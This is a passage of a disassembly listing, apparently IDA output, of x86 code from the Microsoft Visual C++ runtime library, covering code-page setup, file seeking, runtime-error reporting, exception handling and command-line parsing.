sub_41D36B proc near ; CODE XREF: sub_41D4BB+B�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 14h
push offset stru_42C618
call __SEH_prolog
or [ebp+var_1C], 0FFFFFFFFh
push 0Dh
call sub_41A1D6
pop ecx
xor edi, edi
mov [ebp+ms_exc.disabled], edi
mov dword_481348, edi
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_41D3A8
mov dword_481348, 1
call dword_4221B0 ; GetOEMCP
jmp short loc_41D3D3
; ---------------------------------------------------------------------------
loc_41D3A8: ; CODE XREF: sub_41D36B+29�j
cmp eax, 0FFFFFFFDh
jnz short loc_41D3BF
mov dword_481348, 1
call dword_4221AC ; GetACP
jmp short loc_41D3D3
; ---------------------------------------------------------------------------
loc_41D3BF: ; CODE XREF: sub_41D36B+40�j
cmp eax, 0FFFFFFFCh
jnz short loc_41D3D3
mov dword_481348, 1
mov eax, dword_4814A8
loc_41D3D3: ; CODE XREF: sub_41D36B+3B�j
; sub_41D36B+52�j ...
mov [ebp+arg_0], eax
cmp eax, dword_481824
jz loc_41D49D
mov esi, dword_481704
mov [ebp+var_20], esi
cmp esi, edi
jz short loc_41D3F3
cmp [esi], edi
jz short loc_41D403
loc_41D3F3: ; CODE XREF: sub_41D36B+82�j
push 220h
call sub_416E1F
pop ecx
mov esi, eax
mov [ebp+var_20], esi
loc_41D403: ; CODE XREF: sub_41D36B+86�j
cmp esi, edi
jz short loc_41D486
push [ebp+arg_0]
call sub_41D1D5
pop ecx
mov [ebp+var_1C], eax
cmp eax, edi
jnz short loc_41D486
mov [esi], edi
mov eax, dword_481824
mov [esi+4], eax
mov eax, dword_481708
mov [esi+8], eax
mov eax, dword_481700
mov [esi+0Ch], eax
xor eax, eax
loc_41D433: ; CODE XREF: sub_41D36B+DE�j
mov [ebp+var_24], eax
cmp eax, 5
jge short loc_41D44B
mov cx, word_481830[eax*2]
mov [esi+eax*2+10h], cx
inc eax
jmp short loc_41D433
; ---------------------------------------------------------------------------
loc_41D44B: ; CODE XREF: sub_41D36B+CE�j
xor eax, eax
loc_41D44D: ; CODE XREF: sub_41D36B+F7�j
mov [ebp+var_24], eax
cmp eax, 101h
jge short loc_41D464
mov cl, byte_481720[eax]
mov [eax+esi+1Ch], cl
inc eax
jmp short loc_41D44D
; ---------------------------------------------------------------------------
loc_41D464: ; CODE XREF: sub_41D36B+EA�j
xor eax, eax
loc_41D466: ; CODE XREF: sub_41D36B+113�j
mov [ebp+var_24], eax
cmp eax, 100h
jge short loc_41D480
mov cl, byte_481840[eax]
mov [eax+esi+11Dh], cl
inc eax
jmp short loc_41D466
; ---------------------------------------------------------------------------
loc_41D480: ; CODE XREF: sub_41D36B+103�j
mov dword_481704, esi
loc_41D486: ; CODE XREF: sub_41D36B+9A�j
; sub_41D36B+AA�j
cmp [ebp+var_1C], 0FFFFFFFFh
jnz short loc_41D4A0
cmp esi, dword_481704
jz short loc_41D4A0
push esi
call sub_416D07
pop ecx
jmp short loc_41D4A0
; ---------------------------------------------------------------------------
loc_41D49D: ; CODE XREF: sub_41D36B+71�j
mov [ebp+var_1C], edi
loc_41D4A0: ; CODE XREF: sub_41D36B+11F�j
; sub_41D36B+127�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41D4B2
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_41D36B endp
; =============== S U B R O U T I N E =======================================
sub_41D4B2 proc near ; CODE XREF: sub_41D36B+139�p
; DATA XREF: .text:stru_42C618�o
push 0Dh
call sub_41A142
pop ecx
retn
sub_41D4B2 endp
; =============== S U B R O U T I N E =======================================
sub_41D4BB proc near ; CODE XREF: sub_41DC7B+9�p
; sub_41DCE4+D�p ...
cmp dword_482998, 0
jnz short loc_41D4D6
push 0FFFFFFFDh
call sub_41D36B
pop ecx
mov dword_482998, 1
loc_41D4D6: ; CODE XREF: sub_41D4BB+7�j
xor eax, eax
retn
sub_41D4BB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D4D9 proc near ; CODE XREF: sub_41809F+2C�p
; sub_41809F+A7�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
mov [ebp+arg_0], edi
call sub_4191CF
mov eax, [eax+60h]
cmp eax, dword_481704
jz short loc_41D4F8
call sub_41D166
loc_41D4F8: ; CODE XREF: sub_41D4D9+18�j
cmp dword ptr [eax+8], 0
jnz short loc_41D50F
push [ebp+arg_8]
push [ebp+arg_4]
push edi
call sub_416A00
add esp, 0Ch
jmp short loc_41D557
; ---------------------------------------------------------------------------
loc_41D50F: ; CODE XREF: sub_41D4D9+23�j
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_41D554
push ebx
push esi
mov esi, [ebp+arg_4]
loc_41D51B: ; CODE XREF: sub_41D4D9+89�j
mov dl, [esi]
movzx ebx, dl
dec ecx
test byte ptr [ebx+eax+1Dh], 4
mov [edi], dl
jz short loc_41D55A
inc edi
inc esi
test ecx, ecx
jz short loc_41D566
mov dl, [esi]
dec ecx
mov [edi], dl
inc edi
inc esi
test dl, dl
jnz short loc_41D560
and [edi-2], dl
loc_41D53E: ; CODE XREF: sub_41D4D9+85�j
test ecx, ecx
jz short loc_41D552
mov edx, ecx
shr ecx, 2
xor eax, eax
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_41D552: ; CODE XREF: sub_41D4D9+67�j
; sub_41D4D9+8B�j ...
pop esi
pop ebx
loc_41D554: ; CODE XREF: sub_41D4D9+3B�j
mov eax, [ebp+arg_0]
loc_41D557: ; CODE XREF: sub_41D4D9+34�j
pop edi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41D55A: ; CODE XREF: sub_41D4D9+4F�j
inc edi
inc esi
test dl, dl
jz short loc_41D53E
loc_41D560: ; CODE XREF: sub_41D4D9+60�j
test ecx, ecx
jnz short loc_41D51B
jmp short loc_41D552
; ---------------------------------------------------------------------------
loc_41D566: ; CODE XREF: sub_41D4D9+55�j
and byte ptr [edi-1], 0
jmp short loc_41D552
sub_41D4D9 endp
; =============== S U B R O U T I N E =======================================
sub_41D56C proc near ; CODE XREF: sub_41D614+18�p
push esi
push dword_482994
call sub_420775
pop ecx
mov ecx, dword_482990
mov esi, eax
mov eax, dword_482994
mov edx, ecx
sub edx, eax
add edx, 4
cmp esi, edx
jnb short loc_41D5DF
mov ecx, 800h
cmp esi, ecx
jnb short loc_41D59C
mov ecx, esi
loc_41D59C: ; CODE XREF: sub_41D56C+2C�j
add ecx, esi
push ecx
push eax
call sub_417003
test eax, eax
pop ecx
pop ecx
jnz short loc_41D5C2
add esi, 10h
push esi
push dword_482994
call sub_417003
test eax, eax
pop ecx
pop ecx
jnz short loc_41D5C2
pop esi
retn
; ---------------------------------------------------------------------------
loc_41D5C2: ; CODE XREF: sub_41D56C+3D�j
; sub_41D56C+52�j
mov ecx, dword_482990
sub ecx, dword_482994
mov dword_482994, eax
sar ecx, 2
lea ecx, [eax+ecx*4]
mov dword_482990, ecx
loc_41D5DF: ; CODE XREF: sub_41D56C+23�j
mov [ecx], edi
add dword_482990, 4
mov eax, edi
pop esi
retn
sub_41D56C endp
; =============== S U B R O U T I N E =======================================
sub_41D5EC proc near ; DATA XREF: .text:0042E018�o
push 80h
call sub_416E1F
test eax, eax
pop ecx
mov dword_482994, eax
jnz short loc_41D604
push 18h
pop eax
retn
; ---------------------------------------------------------------------------
loc_41D604: ; CODE XREF: sub_41D5EC+12�j
and dword ptr [eax], 0
mov eax, dword_482994
mov dword_482990, eax
xor eax, eax
retn
sub_41D5EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D614 proc near ; CODE XREF: sub_41D64C+4�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset stru_42C628
call __SEH_prolog
call loc_4182D9
and [ebp+ms_exc.disabled], 0
mov edi, [ebp+arg_0]
call sub_41D56C
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41D646
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_41D614 endp
; =============== S U B R O U T I N E =======================================
sub_41D646 proc near ; CODE XREF: sub_41D614+24�p
; DATA XREF: .text:stru_42C628�o
call sub_4182E2
retn
sub_41D646 endp
; =============== S U B R O U T I N E =======================================
sub_41D64C proc near ; CODE XREF: sub_4182EB+3B�p
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_41D614
neg eax
sbb eax, eax
neg eax
pop ecx
dec eax
retn
sub_41D64C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D65E proc near ; CODE XREF: .text:loc_41878F�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_42C638
call __SEH_prolog
mov [ebp+var_1C], offset dword_42CE4C
loc_41D671: ; CODE XREF: sub_41D65E+3C�j
cmp [ebp+var_1C], offset dword_42CE4C
jnb short loc_41D69C
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_41D692
call eax
jmp short loc_41D692
; ---------------------------------------------------------------------------
loc_41D68B: ; DATA XREF: .text:stru_42C638�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41D68F: ; DATA XREF: .text:stru_42C638�o
mov esp, [ebp+ms_exc.old_esp]
loc_41D692: ; CODE XREF: sub_41D65E+27�j
; sub_41D65E+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_41D671
; ---------------------------------------------------------------------------
loc_41D69C: ; CODE XREF: sub_41D65E+1A�j
call __SEH_epilog
retn
sub_41D65E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D6A2 proc near ; DATA XREF: sub_4182EB:loc_418321�o
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_42C648
call __SEH_prolog
mov [ebp+var_1C], offset dword_42CE54
loc_41D6B5: ; CODE XREF: sub_41D6A2+3C�j
cmp [ebp+var_1C], offset dword_42CE54
jnb short loc_41D6E0
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_41D6D6
call eax
jmp short loc_41D6D6
; ---------------------------------------------------------------------------
loc_41D6CF: ; DATA XREF: .text:stru_42C648�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41D6D3: ; DATA XREF: .text:stru_42C648�o
mov esp, [ebp+ms_exc.old_esp]
loc_41D6D6: ; CODE XREF: sub_41D6A2+27�j
; sub_41D6A2+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_41D6B5
; ---------------------------------------------------------------------------
loc_41D6E0: ; CODE XREF: sub_41D6A2+1A�j
call __SEH_epilog
retn
sub_41D6A2 endp
; =============== S U B R O U T I N E =======================================
sub_41D6E6 proc near ; CODE XREF: sub_41B287+18B�p
; sub_41D75A+52�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_41F57B
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_41D707
call sub_41B9A5
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_41D707: ; CODE XREF: sub_41D6E6+F�j
push edi
push [esp+8+arg_8]
push 0
push [esp+10h+arg_4]
push eax
call dword_422090 ; SetFilePointer
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_41D728
call dword_422008 ; RtlGetLastWin32Error
jmp short loc_41D72A
; ---------------------------------------------------------------------------
loc_41D728: ; CODE XREF: sub_41D6E6+38�j
xor eax, eax
loc_41D72A: ; CODE XREF: sub_41D6E6+40�j
test eax, eax
jz short loc_41D73A
push eax
call sub_41B9B7
pop ecx
or eax, 0FFFFFFFFh
jmp short loc_41D757
; ---------------------------------------------------------------------------
loc_41D73A: ; CODE XREF: sub_41D6E6+46�j
mov ecx, esi
and esi, 1Fh
sar ecx, 5
mov ecx, dword_481600[ecx*4]
mov eax, esi
lea eax, [eax+eax*8]
lea eax, [ecx+eax*4+4]
and byte ptr [eax], 0FDh
mov eax, edi
loc_41D757: ; CODE XREF: sub_41D6E6+52�j
pop edi
pop esi
retn
sub_41D6E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D75A proc near ; CODE XREF: sub_418558+69�p
; sub_418875+D0�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 0041D7E9 SIZE 0000001C BYTES
push 0Ch
push offset stru_42C658
call __SEH_prolog
mov ebx, [ebp+arg_0]
cmp ebx, dword_4815F0
jnb short loc_41D7E9
mov eax, ebx
sar eax, 5
lea edi, ds:481600h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
shl esi, 2
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41D7E9
push ebx
call sub_41F5BC
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41D7B9
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
call sub_41D6E6
add esp, 0Ch
mov [ebp+var_1C], eax
jmp short loc_41D7D0
; ---------------------------------------------------------------------------
loc_41D7B9: ; CODE XREF: sub_41D75A+49�j
call sub_41B9A5
mov dword ptr [eax], 9
call sub_41B9AE
and dword ptr [eax], 0
or [ebp+var_1C], 0FFFFFFFFh
loc_41D7D0: ; CODE XREF: sub_41D75A+5D�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41D7E1
mov eax, [ebp+var_1C]
jmp short loc_41D7FF
sub_41D75A endp
; =============== S U B R O U T I N E =======================================
sub_41D7DE proc near ; DATA XREF: .text:stru_42C658�o
mov ebx, [ebp+8]
sub_41D7DE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41D7E1 proc near ; CODE XREF: sub_41D75A+7A�p
push ebx
call sub_41F62F
pop ecx
retn
sub_41D7E1 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41D75A
loc_41D7E9: ; CODE XREF: sub_41D75A+15�j
; sub_41D75A+35�j
call sub_41B9A5
mov dword ptr [eax], 9
call sub_41B9AE
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_41D7FF: ; CODE XREF: sub_41D75A+82�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41D75A
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D805 proc near ; CODE XREF: sub_418558+2B�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, [edi+10h]
xor ebx, ebx
cmp [edi+4], ebx
mov [ebp+var_C], esi
jge short loc_41D821
mov [edi+4], ebx
loc_41D821: ; CODE XREF: sub_41D805+17�j
push 1
push ebx
push esi
call sub_41D75A
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_4], eax
jl short loc_41D8A2
mov ecx, [edi+0Ch]
test cx, 108h
jnz short loc_41D846
sub eax, [edi+4]
jmp loc_41D962
; ---------------------------------------------------------------------------
loc_41D846: ; CODE XREF: sub_41D805+37�j
mov eax, [edi]
mov edx, [edi+8]
mov ebx, eax
sub ebx, edx
test cl, 3
mov [ebp+var_8], ebx
jz short loc_41D893
mov ebx, esi
mov ecx, esi
sar ebx, 5
mov ebx, dword_481600[ebx*4]
and ecx, 1Fh
lea ecx, [ecx+ecx*8]
test byte ptr [ebx+ecx*4+4], 80h
jz short loc_41D885
mov ecx, edx
cmp ecx, eax
jnb short loc_41D885
loc_41D878: ; CODE XREF: sub_41D805+7E�j
cmp byte ptr [ecx], 0Ah
jnz short loc_41D880
inc [ebp+var_8]
loc_41D880: ; CODE XREF: sub_41D805+76�j
inc ecx
cmp ecx, [edi]
jb short loc_41D878
loc_41D885: ; CODE XREF: sub_41D805+6B�j
; sub_41D805+71�j ...
cmp [ebp+var_4], 0
jnz short loc_41D8AA
mov eax, [ebp+var_8]
jmp loc_41D962
; ---------------------------------------------------------------------------
loc_41D893: ; CODE XREF: sub_41D805+50�j
test cl, cl
js short loc_41D885
call sub_41B9A5
mov dword ptr [eax], 16h
loc_41D8A2: ; CODE XREF: sub_41D805+2D�j
or eax, 0FFFFFFFFh
jmp loc_41D962
; ---------------------------------------------------------------------------
loc_41D8AA: ; CODE XREF: sub_41D805+84�j
test byte ptr [edi+0Ch], 1
jz loc_41D95A
mov ecx, [edi+4]
test ecx, ecx
jnz short loc_41D8C3
and [ebp+var_8], ecx
jmp loc_41D95A
; ---------------------------------------------------------------------------
loc_41D8C3: ; CODE XREF: sub_41D805+B4�j
sub eax, edx
add eax, ecx
mov [ebp+arg_0], eax
mov eax, esi
sar eax, 5
lea ebx, ds:481600h[eax*4]
mov eax, esi
and eax, 1Fh
lea esi, [eax+eax*8]
mov eax, [ebx]
shl esi, 2
test byte ptr [esi+eax+4], 80h
jz short loc_41D954
push 2
push 0
push [ebp+var_C]
call sub_41D75A
add esp, 0Ch
cmp eax, [ebp+var_4]
jnz short loc_41D91B
mov eax, [edi+8]
mov ecx, [ebp+arg_0]
add ecx, eax
jmp short loc_41D911
; ---------------------------------------------------------------------------
loc_41D908: ; CODE XREF: sub_41D805+10E�j
cmp byte ptr [eax], 0Ah
jnz short loc_41D910
inc [ebp+arg_0]
loc_41D910: ; CODE XREF: sub_41D805+106�j
inc eax
loc_41D911: ; CODE XREF: sub_41D805+101�j
cmp eax, ecx
jb short loc_41D908
test byte ptr [edi+0Dh], 20h
jmp short loc_41D94F
; ---------------------------------------------------------------------------
loc_41D91B: ; CODE XREF: sub_41D805+F7�j
push 0
push [ebp+var_4]
push [ebp+var_C]
call sub_41D75A
mov eax, 200h
add esp, 0Ch
cmp [ebp+arg_0], eax
ja short loc_41D942
mov ecx, [edi+0Ch]
test cl, 8
jz short loc_41D942
test ch, 4
jz short loc_41D945
loc_41D942: ; CODE XREF: sub_41D805+12E�j
; sub_41D805+136�j
mov eax, [edi+18h]
loc_41D945: ; CODE XREF: sub_41D805+13B�j
mov [ebp+arg_0], eax
mov eax, [ebx]
test byte ptr [esi+eax+4], 4
loc_41D94F: ; CODE XREF: sub_41D805+114�j
jz short loc_41D954
inc [ebp+arg_0]
loc_41D954: ; CODE XREF: sub_41D805+E3�j
; sub_41D805:loc_41D94F�j
mov eax, [ebp+arg_0]
sub [ebp+var_4], eax
loc_41D95A: ; CODE XREF: sub_41D805+A9�j
; sub_41D805+B9�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
add eax, ecx
loc_41D962: ; CODE XREF: sub_41D805+3C�j
; sub_41D805+89�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41D805 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D967 proc near ; CODE XREF: sub_41865A+12�p
; sub_41867F+12�p ...
var_10C = byte ptr -10Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
mov eax, dword_432A68
xor eax, [ebp+4]
mov ecx, [ebp+arg_0]
push ebx
push esi
mov [ebp+var_4], eax
xor edx, edx
push edi
xor eax, eax
loc_41D985: ; CODE XREF: sub_41D967+2B�j
cmp ecx, dword_432B78[eax*8]
jz short loc_41D994
inc eax
cmp eax, 12h
jb short loc_41D985
loc_41D994: ; CODE XREF: sub_41D967+25�j
mov esi, eax
shl esi, 3
cmp ecx, dword_432B78[esi]
jnz loc_41DAC8
mov eax, dword_4811D0
cmp eax, 1
jz loc_41DAA3
cmp eax, edx
jnz short loc_41D9C4
cmp dword_432384, 1
jz loc_41DAA3
loc_41D9C4: ; CODE XREF: sub_41D967+4E�j
cmp ecx, 0FCh
jz loc_41DAC8
push 104h
lea eax, [ebp+var_10C]
push eax
push edx
mov [ebp+var_8], dl
call dword_422010 ; GetModuleFileNameA
test eax, eax
jnz short loc_41D9FD
lea eax, [ebp+var_10C]
push offset aProgramNameUnk ; "<program name unknown>"
push eax
call sub_41BFE0
pop ecx
pop ecx
loc_41D9FD: ; CODE XREF: sub_41D967+81�j
lea eax, [ebp+var_10C]
push eax
lea edi, [ebp+var_10C]
call sub_419D70
inc eax
cmp eax, 3Ch
pop ecx
jbe short loc_41DA3F
lea eax, [ebp+var_10C]
push eax
call sub_419D70
mov edi, eax
lea eax, [ebp+var_10C]
sub eax, 3Bh
push 3
add edi, eax
push offset a___ ; "..."
push edi
call sub_416A00
add esp, 10h
loc_41DA3F: ; CODE XREF: sub_41D967+AD�j
push edi
call sub_419D70
push off_432B7C[esi]
mov ebx, eax
call sub_419D70
lea eax, [ebx+eax+1Ch]
pop ecx
add eax, 3
pop ecx
and eax, 0FFFFFFFCh
call sub_416B90
mov ebx, esp
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
push ebx
call sub_41BFE0
push edi
push ebx
call sub_41BFF0
push offset asc_42C988 ; "\n\n"
push ebx
call sub_41BFF0
push off_432B7C[esi]
push ebx
call sub_41BFF0
push 12010h
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push ebx
call sub_4207EB
add esp, 2Ch
jmp short loc_41DAC8
; ---------------------------------------------------------------------------
loc_41DAA3: ; CODE XREF: sub_41D967+46�j
; sub_41D967+57�j
push edx
lea eax, [ebp+arg_0]
push eax
lea esi, off_432B7C[esi]
push dword ptr [esi]
call sub_419D70
pop ecx
push eax
push dword ptr [esi]
push 0FFFFFFF4h
call dword_4221B8 ; GetStdHandle
push eax
call dword_422030 ; WriteFile
loc_41DAC8: ; CODE XREF: sub_41D967+38�j
; sub_41D967+63�j ...
lea esp, [ebp-118h]
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
call sub_41C596
pop edi
pop esi
pop ebx
leave
retn
sub_41D967 endp
; =============== S U B R O U T I N E =======================================
sub_41DADE proc near ; CODE XREF: sub_41865A+9�p
; sub_41867F+9�p
mov eax, dword_4811D0
cmp eax, 1
jz short loc_41DAF5
test eax, eax
jnz short locret_41DB16
cmp dword_432384, 1
jnz short locret_41DB16
loc_41DAF5: ; CODE XREF: sub_41DADE+8�j
push 0FCh
call sub_41D967
mov eax, dword_48134C
test eax, eax
pop ecx
jz short loc_41DB0B
call eax
loc_41DB0B: ; CODE XREF: sub_41DADE+29�j
push 0FFh
call sub_41D967
pop ecx
locret_41DB16: ; CODE XREF: sub_41DADE+C�j
; sub_41DADE+15�j
retn
sub_41DADE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DB17 proc near ; CODE XREF: .text:00418847�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
call sub_4191CF
mov edi, [ebp+arg_0]
mov esi, eax
mov edx, [esi+54h]
mov eax, dword_432C8C
mov ecx, edx
loc_41DB32: ; CODE XREF: sub_41DB17+2A�j
cmp [ecx], edi
jz short loc_41DB43
lea ebx, [eax+eax*2]
add ecx, 0Ch
lea ebx, [edx+ebx*4]
cmp ecx, ebx
jb short loc_41DB32
loc_41DB43: ; CODE XREF: sub_41DB17+1D�j
lea eax, [eax+eax*2]
lea eax, [edx+eax*4]
cmp ecx, eax
jnb short loc_41DB51
cmp [ecx], edi
jz short loc_41DB53
loc_41DB51: ; CODE XREF: sub_41DB17+34�j
xor ecx, ecx
loc_41DB53: ; CODE XREF: sub_41DB17+38�j
test ecx, ecx
jz loc_41DC6D
mov ebx, [ecx+8]
test ebx, ebx
mov [ebp+arg_0], ebx
jz loc_41DC6D
cmp ebx, 5
jnz short loc_41DB7A
and dword ptr [ecx+8], 0
xor eax, eax
inc eax
jmp loc_41DC76
; ---------------------------------------------------------------------------
loc_41DB7A: ; CODE XREF: sub_41DB17+55�j
cmp ebx, 1
jz loc_41DC68
mov eax, [esi+58h]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
mov [esi+58h], eax
mov eax, [ecx+4]
cmp eax, 8
jnz loc_41DC5A
mov edx, dword_432C80
mov eax, dword_432C84
add eax, edx
cmp edx, eax
jge short loc_41DBD3
lea eax, [edx+edx*2]
shl eax, 2
loc_41DBB2: ; CODE XREF: sub_41DB17+B7�j
mov edi, [esi+54h]
and dword ptr [eax+edi+8], 0
mov edi, dword_432C80
mov ebx, dword_432C84
inc edx
add ebx, edi
add eax, 0Ch
cmp edx, ebx
jl short loc_41DBB2
mov ebx, [ebp+arg_0]
loc_41DBD3: ; CODE XREF: sub_41DB17+93�j
mov ecx, [ecx]
cmp ecx, 0C000008Eh
mov edi, [esi+5Ch]
jnz short loc_41DBE9
mov dword ptr [esi+5Ch], 83h
jmp short loc_41DC4D
; ---------------------------------------------------------------------------
loc_41DBE9: ; CODE XREF: sub_41DB17+C7�j
cmp ecx, 0C0000090h
jnz short loc_41DBFA
mov dword ptr [esi+5Ch], 81h
jmp short loc_41DC4D
; ---------------------------------------------------------------------------
loc_41DBFA: ; CODE XREF: sub_41DB17+D8�j
cmp ecx, 0C0000091h
jnz short loc_41DC0B
mov dword ptr [esi+5Ch], 84h
jmp short loc_41DC4D
; ---------------------------------------------------------------------------
loc_41DC0B: ; CODE XREF: sub_41DB17+E9�j
cmp ecx, 0C0000093h
jnz short loc_41DC1C
mov dword ptr [esi+5Ch], 85h
jmp short loc_41DC4D
; ---------------------------------------------------------------------------
loc_41DC1C: ; CODE XREF: sub_41DB17+FA�j
cmp ecx, 0C000008Dh
jnz short loc_41DC2D
mov dword ptr [esi+5Ch], 82h
jmp short loc_41DC4D
; ---------------------------------------------------------------------------
loc_41DC2D: ; CODE XREF: sub_41DB17+10B�j
cmp ecx, 0C000008Fh
jnz short loc_41DC3E
mov dword ptr [esi+5Ch], 86h
jmp short loc_41DC4D
; ---------------------------------------------------------------------------
loc_41DC3E: ; CODE XREF: sub_41DB17+11C�j
cmp ecx, 0C0000092h
jnz short loc_41DC4D
mov dword ptr [esi+5Ch], 8Ah
loc_41DC4D: ; CODE XREF: sub_41DB17+D0�j
; sub_41DB17+E1�j ...
push dword ptr [esi+5Ch]
push 8
call ebx
pop ecx
mov [esi+5Ch], edi
jmp short loc_41DC61
; ---------------------------------------------------------------------------
loc_41DC5A: ; CODE XREF: sub_41DB17+7E�j
and dword ptr [ecx+8], 0
push eax
call ebx
loc_41DC61: ; CODE XREF: sub_41DB17+141�j
mov eax, [ebp+var_4]
pop ecx
mov [esi+58h], eax
loc_41DC68: ; CODE XREF: sub_41DB17+66�j
or eax, 0FFFFFFFFh
jmp short loc_41DC76
; ---------------------------------------------------------------------------
loc_41DC6D: ; CODE XREF: sub_41DB17+3E�j
; sub_41DB17+4C�j
push [ebp+arg_4]
call dword_4221BC ; UnhandledExceptionFilter
loc_41DC76: ; CODE XREF: sub_41DB17+5E�j
; sub_41DB17+154�j
pop edi
pop esi
pop ebx
leave
retn
sub_41DB17 endp
; =============== S U B R O U T I N E =======================================
sub_41DC7B proc near ; CODE XREF: .text:004187FF�p
cmp dword_482998, 0
jnz short loc_41DC89
call sub_41D4BB
loc_41DC89: ; CODE XREF: sub_41DC7B+7�j
push esi
mov esi, dword_482988
test esi, esi
jnz short loc_41DC9B
mov esi, 422B02h
jmp short loc_41DCE0
; ---------------------------------------------------------------------------
loc_41DC9B: ; CODE XREF: sub_41DC7B+17�j
mov al, [esi]
cmp al, 22h
jnz short loc_41DCC9
inc esi
mov al, [esi]
cmp al, 22h
jz short loc_41DCD9
loc_41DCA8: ; CODE XREF: sub_41DC7B+45�j
test al, al
jz short loc_41DCC2
movzx eax, al
push eax
call sub_420915
test eax, eax
pop ecx
jz short loc_41DCBB
inc esi
loc_41DCBB: ; CODE XREF: sub_41DC7B+3D�j
inc esi
mov al, [esi]
cmp al, 22h
jnz short loc_41DCA8
loc_41DCC2: ; CODE XREF: sub_41DC7B+2F�j
cmp byte ptr [esi], 22h
jnz short loc_41DCDA
jmp short loc_41DCD9
; ---------------------------------------------------------------------------
loc_41DCC9: ; CODE XREF: sub_41DC7B+24�j
cmp al, 20h
jbe short loc_41DCDA
loc_41DCCD: ; CODE XREF: sub_41DC7B+56�j
inc esi
cmp byte ptr [esi], 20h
ja short loc_41DCCD
jmp short loc_41DCDA
; ---------------------------------------------------------------------------
loc_41DCD5: ; CODE XREF: sub_41DC7B+63�j
cmp al, 20h
ja short loc_41DCE0
loc_41DCD9: ; CODE XREF: sub_41DC7B+2B�j
; sub_41DC7B+4C�j
inc esi
loc_41DCDA: ; CODE XREF: sub_41DC7B+4A�j
; sub_41DC7B+50�j ...
mov al, [esi]
test al, al
jnz short loc_41DCD5
loc_41DCE0: ; CODE XREF: sub_41DC7B+1E�j
; sub_41DC7B+5C�j
mov eax, esi
pop esi
retn
sub_41DC7B endp
; =============== S U B R O U T I N E =======================================
sub_41DCE4 proc near ; CODE XREF: .text:loc_4187CE�p
push ebx
xor ebx, ebx
cmp dword_482998, ebx
push esi
push edi
jnz short loc_41DCF6
call sub_41D4BB
loc_41DCF6: ; CODE XREF: sub_41DCE4+B�j
mov esi, dword_4811C8
xor edi, edi
